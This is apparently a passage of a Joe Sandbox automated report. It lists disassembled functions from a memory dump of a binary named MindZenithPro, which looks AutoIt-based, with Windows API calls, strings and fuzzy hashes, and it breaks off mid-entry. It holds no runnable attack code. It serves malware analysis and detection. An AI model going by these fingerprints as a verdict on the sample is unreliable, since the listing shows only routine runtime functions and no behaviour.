                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    • Opcode ID: 7a3433513b7382ff86a02ebb5369b79623989c2b6bc209cdb37a317134c9798c
                                    • Instruction ID: 4cef5798bd92b188e2328f72adfe9e36a4d0863fcd0937dd0d79ef480cd724ac
                                    • Opcode Fuzzy Hash: 7a3433513b7382ff86a02ebb5369b79623989c2b6bc209cdb37a317134c9798c
                                    • Instruction Fuzzy Hash: 0F517B71418B449BE321AF14DC86BAFBBF8FF84314F41885DF5D8851A1EB709868CB66
                                    Function 0043D863 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 0043D89F
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0043D8A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CrackInternet_wcslen
                                    • String ID: |
                                    • API String ID: 596671847-2343686810
                                    • Opcode ID: 1f26d8c134425c3fe8961fee496a99add95aa8929746152c570f138aecd78519
                                    • Instruction ID: 89509e99993894a2e75fb55cc03d89929fd33f787c006a83d613e68a682f54e0
                                    • Opcode Fuzzy Hash: 1f26d8c134425c3fe8961fee496a99add95aa8929746152c570f138aecd78519
                                    • Instruction Fuzzy Hash: 50312871C00119AFDF16AFA1DD85EEEBFB9FF08310F104029E815AA266D6369906CB50
                                    Function 00454CF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00454DDF
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00454DF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: '
                                    • API String ID: 3850602802-1997036262
                                    • Opcode ID: 81884bb09fedba5504e77476d8be6f7bc45144bde3ae575ffe8e9b29d03948f2
                                    • Instruction ID: 72bba691e61c95ac86127053b8af8757ce6ff260c6be3c7c6a7a25ac6a39aaa9
                                    • Opcode Fuzzy Hash: 81884bb09fedba5504e77476d8be6f7bc45144bde3ae575ffe8e9b29d03948f2
                                    • Instruction Fuzzy Hash: F0312874A01309AFDB14CFA5C981BDA7BB5FF89305F10406AED04AB352D774A949CF94
                                    Function 004539AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00453A3A
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00453A45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 7c58a0aa78d47405cd395dcb11b69ec35233330cff7c377a054f491372b7c598
                                    • Instruction ID: f30983e2beffe44debc1d68a164a5479214c2a21cfb489c59d857f3644694971
                                    • Opcode Fuzzy Hash: 7c58a0aa78d47405cd395dcb11b69ec35233330cff7c377a054f491372b7c598
                                    • Instruction Fuzzy Hash: 3511E6B1300208BFEF119E14CC81EBB375AEB843A6F10412AF95897292D6799D558764
                                    Function 0043D48D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0043D4EC
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0043D515
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: e2c0cb1703671eb60307cdeaaf903b7fe6caf8b96d5786a43aa34eb947927ef9
                                    • Instruction ID: 58133de1375bb9ea6fb15ad47156bc4d37e8f89b48a7560d3f82a3c637a6f6dc
                                    • Opcode Fuzzy Hash: e2c0cb1703671eb60307cdeaaf903b7fe6caf8b96d5786a43aa34eb947927ef9
                                    • Instruction Fuzzy Hash: FF112971A052317AD7384B66AC49EF7BE5CEF2A7B8F005227B51983180D378A841C6F4
                                    Function 00453BE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 00453C69
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00453C78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: d1b41eeccbfee8cf443a61196a08b4dd001b6c0340f94a375faa2434522cdb0f
                                    • Instruction ID: 99fd528dd57b077d7a2a70a1aeb460d98bad355b15f4f782240f29b74f88ae77
                                    • Opcode Fuzzy Hash: d1b41eeccbfee8cf443a61196a08b4dd001b6c0340f94a375faa2434522cdb0f
                                    • Instruction Fuzzy Hash: B011B272500208ABEB229F64DC44AAB3769EF043AAF104725FD61A72D1C739DC599758
                                    Function 0042737F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                    • CharUpperBuffW.USER32(?,?,?), ref: 004273AF
                                    • _wcslen.LIBCMT ref: 004273BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: STOP
                                    • API String ID: 1256254125-2411985666
                                    • Opcode ID: 5a0ac1c0f6a638ae9fb9b69b0fc05b7bd3eaadda887114fce51714aa165c5326
                                    • Instruction ID: 09d6797b51f4350f5da553e65712bb02601b0fa8bef319569b1b3885215d6893
                                    • Opcode Fuzzy Hash: 5a0ac1c0f6a638ae9fb9b69b0fc05b7bd3eaadda887114fce51714aa165c5326
                                    • Instruction Fuzzy Hash: 9201A532B145364BCB11EEBDEC809AF77A4BF60714790092AEC21D6291E738DD05D754
                                    Function 004223C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                      • Part of subcall function 00424392: GetClassNameW.USER32(?,?,000000FF), ref: 004243B5
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0042242E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: 2c9d97b63f9489963a9ad74259ca6dd9bae4991b2894c5041b923212be3db81a
                                    • Instruction ID: 65c8c6ff31e2cb3d37586448b51979913695d8ab2fc1d60bf49195d71eaf05f5
                                    • Opcode Fuzzy Hash: 2c9d97b63f9489963a9ad74259ca6dd9bae4991b2894c5041b923212be3db81a
                                    • Instruction Fuzzy Hash: B101D6717006286B8B05F7A4DC45DEE3364FB45318B500A1AA8629B3D2DA785809C719
                                    Function 004222BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                      • Part of subcall function 00424392: GetClassNameW.USER32(?,?,000000FF), ref: 004243B5
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00422328
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: 41e753681f0b7302de5159fde83a869d0895723a2ae575305d1d3351ba688895
                                    • Instruction ID: 0fc3dc65d7ada5aa61f3c16049b3326e16baabd27db0f3feaec25e54b54760b8
                                    • Opcode Fuzzy Hash: 41e753681f0b7302de5159fde83a869d0895723a2ae575305d1d3351ba688895
                                    • Instruction Fuzzy Hash: 2801FC71B001287BCB15E7A0DA51FEF73A8DF05304F54041E6C02AB281DA5C9E0997BA
                                    Function 0042233E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                      • Part of subcall function 00424392: GetClassNameW.USER32(?,?,000000FF), ref: 004243B5
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 004223AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: d23a87458bc8200e75ee1b1aeaa13041176d65bf03791465ba0f6f8f7d66f48c
                                    • Instruction ID: 0968a9c015836ceb0c69dd41042a6033cf4a5aff18612609ef53ab2b74d3ce32
                                    • Opcode Fuzzy Hash: d23a87458bc8200e75ee1b1aeaa13041176d65bf03791465ba0f6f8f7d66f48c
                                    • Instruction Fuzzy Hash: B501DB71B4011977CB01EBA1DA41FEF77A89B11344F94441BBC02FB382DA5C9E09977A
                                    Function 0042244A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                      • Part of subcall function 00424392: GetClassNameW.USER32(?,?,000000FF), ref: 004243B5
                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 004224B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: 6328e37979d2674bd95eab1deb05105f3526c2c33d6ae4b9d8ec9534d7eb6727
                                    • Instruction ID: e773651c8e90a15172e1b89c66c8b6859e025a25e51c8f7470d3cd87da88f633
                                    • Opcode Fuzzy Hash: 6328e37979d2674bd95eab1deb05105f3526c2c33d6ae4b9d8ec9534d7eb6727
                                    • Instruction Fuzzy Hash: C7F0F971B4022977CB05F3A49C51FFF3368AF00318F540D1AB822EB6C1DAA86C098369
                                    Function 004211F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00421205
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Message
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 2030045667-4017498283
                                    • Opcode ID: c79fa0b36e89242f1dfc6aff72f35012214331083ea9e25fafbdd78635043929
                                    • Instruction ID: 711e3556f1aed7c2d822a168413b09ddc7bfc259fad8c9100d545c9d5b3e0224
                                    • Opcode Fuzzy Hash: c79fa0b36e89242f1dfc6aff72f35012214331083ea9e25fafbdd78635043929
                                    • Instruction Fuzzy Hash: 81E0483264436826D22A37557C03F8A7A858F04B55F21451BFA889D5C34AE66490569D
                                    Function 003E1092 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003DFBC6: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003E10C1,?,?,?,003C100A), ref: 003DFBCB
                                    • IsDebuggerPresent.KERNEL32(?,?,?,003C100A), ref: 003E10C5
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003C100A), ref: 003E10D4
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003E10CF
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 55579361-631824599
                                    • Opcode ID: a963133e6dfdda65f5d331d7fab181813b4370e4562e5c11ba4f23c094f730d3
                                    • Instruction ID: fb916eb9d1ab91c547d56cef245e2d1794be8268958cd9563737e941b4d8184e
                                    • Opcode Fuzzy Hash: a963133e6dfdda65f5d331d7fab181813b4370e4562e5c11ba4f23c094f730d3
                                    • Instruction Fuzzy Hash: 2AE092706007A08FC3319F7AE9447037BE0AF14305F008E6EF886C6681EBB5D884CB92
                                    Function 003DEF99 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 003DEFD6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: P5I$X5I
                                    • API String ID: 1385522511-1596188172
                                    • Opcode ID: 6779a968210c45b1b6d03d698115cdf5d3add949c8b7e402d7d142da52abc5d7
                                    • Instruction ID: fd855e7c99074f8fb54e500c8e970dba1c6a88bc1a9b3587a5ee7453de1319b2
                                    • Opcode Fuzzy Hash: 6779a968210c45b1b6d03d698115cdf5d3add949c8b7e402d7d142da52abc5d7
                                    • Instruction Fuzzy Hash: 08E086335049A0ABCA07BF1CB8419983B59AB1F331B134277E1128F7D19B243E819A5C
                                    Function 003C4DD2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyIcon.USER32(L+IP+I,00492B4C,004929B0,?,003C3A09,00492B4C,00492B50,?,?,004929B0), ref: 004040DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: DestroyIcon
                                    • String ID: :<L+IP+I$L+IP+I
                                    • API String ID: 1234817797-1896975166
                                    • Opcode ID: d3e52837157565b3f628b4a1ee4999df6eaed0f0ae47219800312b2ab92e7bee
                                    • Instruction ID: af4073dc4c539a09224fc67af4782c163046e1c35f1b0416799ce3d9f82495ef
                                    • Opcode Fuzzy Hash: d3e52837157565b3f628b4a1ee4999df6eaed0f0ae47219800312b2ab92e7bee
                                    • Instruction Fuzzy Hash: 49E0C236404206EBD7222F08D404B91FBECEF61331F34402BE283D6052D3B45CA0C795
                                    Function 00433702 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0043371A
                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0043372F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: e233d88f4eea52552a07447c8cfd1d11df13bf08dd63732d7bb73973838cbfbb
                                    • Instruction ID: 549474f0e8c854b5b3a9ff0c002aad39db12c0336ef707ae466e189ba7e40f3d
                                    • Opcode Fuzzy Hash: e233d88f4eea52552a07447c8cfd1d11df13bf08dd63732d7bb73973838cbfbb
                                    • Instruction Fuzzy Hash: 40D05E7290032867DA30A7A09C4EFCB7A6CDB44711F0006A1BA5592092EAB4DA85CB94
                                    Function 00452ADD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00452AE7
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00452AFA
                                      • Part of subcall function 0042EFBC: Sleep.KERNEL32 ref: 0042F034
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 49c71bb7a0edd63cd5d1811600ec149ca8a1ff1f33802288180ae6dd780d48a1
                                    • Instruction ID: 1c33ba13d3a5410a21c50158370ec47ee4abbb630b1b1f588af7c0d73095979a
                                    • Opcode Fuzzy Hash: 49c71bb7a0edd63cd5d1811600ec149ca8a1ff1f33802288180ae6dd780d48a1
                                    • Instruction Fuzzy Hash: DAD02231780310B7F2347731EC0FFC7AA109F00B02F20083A7309AA2C2C9E4A800830C
                                    Function 00452B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00452B27
                                    • PostMessageW.USER32(00000000), ref: 00452B2E
                                      • Part of subcall function 0042EFBC: Sleep.KERNEL32 ref: 0042F034
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
